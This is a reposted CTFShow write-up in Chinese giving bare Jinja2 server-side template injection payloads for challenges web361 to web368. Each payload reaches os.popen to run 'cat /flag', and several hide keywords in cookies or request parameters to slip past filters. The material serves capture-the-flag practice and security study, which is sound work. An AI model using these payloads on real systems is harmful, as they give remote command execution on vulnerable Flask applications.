【原创】CTFShow—SSTI

admin 2022年12月3日16:26:27评论11 views字数 1026阅读3分25秒阅读模式

[huayang]

web361

【原创】CTFShow—SSTI
?name={{().__class__.__bases__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web362

【原创】CTFShow—SSTI
{{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

web363

【原创】CTFShow—SSTI
?a=os&b=popen&c=cat /flag&name={{url_for.__globals__[request.args.a][request.args.b](request.args.c).read()}}

web364

【原创】CTFShow—SSTI
get:
?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
cookie:
;x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

web365

【原创】CTFShow—SSTI
get:
?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}
cookie:
;a=__globals__;b=cat /flag

web366

【原创】CTFShow—SSTI
get:
?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
cookie:
;x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /f*').read()

web367-368

【原创】CTFShow—SSTI
?a=__globals__&b=os&c=cat /flag&name={% print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}

[/huayang]

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:26:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】CTFShow—SSTIhttps://cn-sec.com/archives/1442960.html

发表评论

匿名网友 填写信息